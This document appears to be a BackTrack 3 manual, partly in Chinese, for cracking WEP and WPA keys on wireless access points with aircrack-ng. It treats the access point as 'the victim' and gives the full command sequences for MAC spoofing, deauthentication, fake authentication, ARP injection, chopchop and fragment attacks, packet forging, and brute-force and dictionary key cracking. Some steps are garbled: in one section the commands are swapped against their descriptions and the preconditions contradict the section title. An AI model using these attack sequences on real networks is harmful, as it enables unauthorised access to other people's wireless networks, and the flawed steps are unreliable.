BT3 Crack WEP WPA Manual
0. Make bootable USB
Format USB to fat32 under windows system.
Mount bt3-usb.iso.
Copy boot and BT3 folders into USB.
Run boot/bootinst.bat
OK.
Login into BT3 system (KDE) Use: root Pwd: toor
OK? Try this. #startx
OK? Try this again. #xconfig #startx
|
Note
If the execution of the command not return immediately, just open a new shell to execute the next command.
Wireless Net Card WNC, yourself wireless net card.
Access Point AP, the victim.
1. CRACK OPEN WEP WITH VALID CLIENT ARP
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client can only generate valid ARP data.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. Optioal. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel of AP.
#airmon-ng start wifi0 11
Optioal. Show wifi0 working model and wording channel
#iwconfi wifi0
Optioal. Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Crack out the password of AP now.
#wesside-ng -i wifi0 –v 00:00:00:00:00:00
2. CRACK OPEN WEP WITH LOTS OF VALID CLIENT IVS DATA
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client can generate plenty of valid data.
We can get lots of ivs data from AP client.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel
#airmon-ng start wifi0 11
Show wifi0 working model and wording channel
#iwconfi wifi0
Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Get ivs data file.-w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Crack out the password of AP now.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
3. CRACK OPEN WEP WITH LESS VALID CLIENT IVS DATA
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client can generate less valid ivs data.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel
#airmon-ng start wifi0 11
Show wifi0 working model and wording channel
#iwconfi wifi0
Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Get ivs data file.-w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. Using ARP injection to get lots of ivs data. This step may take a long time to wait for ARP. You could use another PC or laptop to connect to the AP and supply a ARP packet.
#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0
Step8. Crack out the password of AP now.
#aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs
4. CRACK OPEN WEP WITH VALID CLIENT BUT NO COMMUNICATION
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client do no communication to AP.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel
#airmon-ng start wifi0 11
Show wifi0 working model and wording channel
#iwconfi wifi0
Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Get ivs data file.-w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. -0 force confliction model disconnect AP and AP client and let them reconnect.
#aireplay-ng -3 -b 00:00:00:00:00:00 -h CC:CC:CC:CC:CC:CC wifi0
Step8. Make use of reconnection data of Step7 to complete ARP injection.
#aireplay-ng -0 10 –a 00:00:00:00:00:00 -c CC:CC:CC:CC:CC:CC wifi0
5. CRACK OPEN WEP WITH OUT CLIENT
Precondition
AP use WEP encrypting.
AP is Open model.
AP has valid client.
AP client do no communication to AP.
Open the wireless switch of your laptop.
Step1. Unload iwl3945 driver for Intel3945 wireless net card driver(WNC).
#modprobe –r iwl3945
Step2. Load monitorable WNC driver for Intel3945. Different WNC has different loading procedure.
#modeprobe ipwraw
#airmon-ng
#modinfo ipwraw
Step3. Search AP. After you get the info (ESSID, MAC, Having client or not, Client MAC), you should Ctrl+C close the searching program.
#airodump-ng wifi0
Suppose we get a AP as following:
AP MAC | 00:00:00:00:00:00 |
AP ESSID | tenda |
AP Channel | 11 |
AP Client MAC | CC:CC:CC:CC:CC:CC |
Step4. For the safety, change yourself WNC MAC. As 11:11:11:11:11:11
#macchanger –m 11:11:11:11:11:11 wifi0
Step5. Activate the wifi0 and let it work on channel
#airmon-ng start wifi0 11
Show wifi0 working model and wording channel
#iwconfi wifi0
Test injection ability of yourself WNC.
#aireplay-ng -9 wifi0
Step6. Get ivs data file.-w <data file name> -c <channel>
#airodump-ng --ivs -w dumped_data -c 11 wifi0
Step7. For there is no AP client, We need to create a virtual connection to AP. So, make a association from your WNC to the AP now.
#aireplay-ng -1 0 -e tenda -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Failure Reason
AP has MAC filter.
Feeble signal from AP.
AP has WPA encryption.
Conflict between WNC and MAC. e.g. different working channel.
Try
Cancel the [–e tenda]parameter.
Set lower rate. E.g. #iwconfig wifi0 rate 2M
To confirm the virtual connection.
# tcpdump -n -e -s0 -vvv -i wifi0
There are three kind of methods to do future cracking work.
Case1
Step8. Using -2 attack model. it can do seizing data, extracting data and injecting data. #aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0 Enter [Y/y] for question “Use this packet ?” to launch the attack. After get enough ivs data, you could use aircrack-ng to do crack.
Step9. Using aircrack-ng. AS #aircrack-ng -n 64 -b 00:00:00:00:00:00 dumped_data-01.ivs #
|
Case2
Step8. Get xor file that contains valid password information. The generated xor file name is start with “fragment”. #aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
Step9. Using xor file, create a fake ARP packet. –y xor_file –w fake_arp_file #packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 –l 255.255.255.255 –y fragment-xxxx-xxxxxx.xor -w myarp
Step10. Using -2 attack model. –r fake_arp_file –x data_sent_rate, less than 1024 #aireplay-ng -2 –r myarp -x 256 rausb0 Data on the windows of Step6 will grow rapid. When the data grow to 1.5W, use aircrack-ng to do crack.
Step11. Using aircrack-ng.
|
Case3
Step8. Using -4 model to get a xor file of which the name is start with “replay”. #aireplay-ng -4 -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0 Step9. Using xor file, create a fake ARP packet. –y xor_file –w fake_arp_file #packetforge-ng -0 –a 00:00:00:00:00:00 -h 11:11:11:11:11:11 -k 255.255.255.255 –l 255.255.255.255 –y replay-xxxx-xxxxxx.xor -w myarp
Step10. Using -2 attack model. –r fake_arp_file –x data_sent_rate, less than 1024 #aireplay-ng -2 –r myarp -x 256 rausb0 Data on the windows of Step6 will grow rapid. When the data grow to 1.5W, use aircrack-ng to do crack.
Step11. Using aircrack-ng.
|
Injection Note
When doing the injection, if the data does not grow and keeps 0, you could try these method to succeed.
Method1. Change the position of your PC or laptop to get better signal for your WNC.
Method2. During the injection attack, you could issue the following command many times. #aireplay-ng -1 0 -e tenda -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0 This is to build a virtual connection from WNC to AP.
Method3. In the -2 attack model, you could add –F parameter. As following. #aireplay-ng -2 –F –p 0841 –c FF:FF:FF:FF:FF:FF –b 00:00:00:00:00:00 -h 11:11:11:11:11:11 wifi0
Method4. When your program is waiting for injection data packet, you could use another PC or laptop to connection to the AP. Just enter a random password for the prompt of login password. And the waiting program will seize the a injectable data packet and complete the injection.
|
aireplay-ng attack specification
-0 deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,
从而产生有效ARP request。如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
#aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
参数说明:
【-0】:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上
网)。
【-a】:设置AP的MAC。
【-c】:设置已连接的合法客户端的MAC。如果不设置-c,则断开所有和AP连接的合法客户端。
#aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器。
-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和AP进行连接。
这步是无客户端的破解的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让AP接受数据包,必须使自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发送的数据包,IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生ARP包。
#aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
参数说明:
【-1】:伪装客户端连接模式,后面跟延时。
【-e】:设置AP的essid。
【-a】:设置AP的MAC。
【-h】:设置伪装客户端的网卡MAC(即自己网卡MAC)。
-2 interactive 交互模式
这种攻击模式是一个抓包、提取数据和发攻击包,三种集合一起的模式。
1.这种模式主要用于破解无客户端,先用-1建立虚假客户端连接然后直接发包攻击。
#aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明:
【-2】:交互攻击模式
【-p】设置控制帧中包含的信息(16进制),默认采用0841
【-c】设置目标MAC地址
【-b】设置AP的MAC地址
【-h】设置伪装客户端的网卡MAC(即自己网卡MAC)
2.提取包,发送注入数据包
#aireplay-ng -2 –r <file> -x 1024 wifi0
发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择1024。
-3 ARP request 注入攻击模式
这种模式是一种抓包后分析重发的过程。
这种攻击模式很有效。既可以利用合法客户端,也可以配合-1模式利用虚拟连接的伪装客户端。如果有合法客
户端那一般需要等几分钟,让合法客户端和AP之间通信,少量数据就可产生有效ARP request才可利用-3
模式注入成功。如果没有任何通信存在,不能得到ARP request,则这种攻击就会失败。如果合法客户端和
AP之间长时间内没有ARP request,可以尝试同时使用-0模式攻击。
如果没有合法客户端,则可以利用-1模式建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生
有效ARP request。再通过-3 模式注入。
#aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明:
【-3】:arp注入攻击模式
【-b】:设置AP的MAC
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)
-4 chopchop 攻击模式
用以获得一个包含密钥数据的xor文件。
这种模式主要是获得一个可利用包含密钥数据的xor文件,不能用来解密数据包。而是用它来产生一个新
的数据包以便我们可以进行注入。
#aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明:
-b:设置需要破解的AP的MAC。
-h:设置虚拟伪装连接的MAC(即自己网卡的MAC)。
-5 fragment 碎片包攻击模式
用以获得PRGA(包含密钥的后缀为xor的文件)。
这种模式主要是获得一个可利用PRGA,这里的PRGA并不是wep key数据,不能用来解密数据包。而是
用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播
时,一个新的IVS将产生,我们就是利用这个来破解。
#aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻击模式。
【-b】:设置AP的MAC。
【-h】:设置虚拟伪装连接的MAC(即自己网卡的MAC)。
packetforge-ng data packet builder
Packetforge-ng <mode> <options>
Mode
【-0】:伪造ARP包
#packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255–y <.xor file> -w myarp
参数说明:
【-0】:伪装ARP数据包
【-a】:设置AP的MAC
【-h】设置虚拟伪装连接的MAC(即自己的MAC)
【-k】<IP[:port]>说明:设置目标文件IP和端口
【-l】<IP[:port]>说明:设置源文件IP和端口
【-y】<.xor file>说明:从xor 文件中读取PRGA。后面跟xor 的文件名。
【-w】设置伪装的ARP包的文件名
aircrack-ng WEP WPA-PSK key cracker
Aircrack-ng [optin] <.cap/.ivs file>
Optin
#aircrack-ng -n 64 -b <ap mac> name-01.ivs
参数说明:
【-n】:设置WEP KEY 长度(64/128/152/256/512)
#aircrack-ng -x -f 2 name-01h.cap
参数说明:
【-x】:设置为暴力破解模式
【-f】:设置复杂程度,WEP密码设置为1,WPA 密码设置为2
#aircrack-ng -w password.txt ciw.cap
【-w】:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA验证的抓包
文件。
常见问题荟萃
问题1:我在启动BT3 的时候,输入startx黑屏
解答:在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会,然后出来提示符再输入startx 可进入
win窗口;当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令,同时可用alt+f1 打开
一个shell,alt+f2 打开第二个shell,alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键
问题2:在BT3中打开kismet 的时候窗口一闪就没了。
解答:首先加载驱ifconfig -a rausb0 开始网卡监听:airmon-ng start rausb0。找到/usr/local/etc/kismet.conf
打开此文件在channelsplit=true下面加入一行source=rt2500,rausb0,monitor
注:
wusb54g v4一定是rt2500 ,不是加载驱动时显示的rt2570。3945 的兄弟加入source=ipw3945,eth0,IPW3945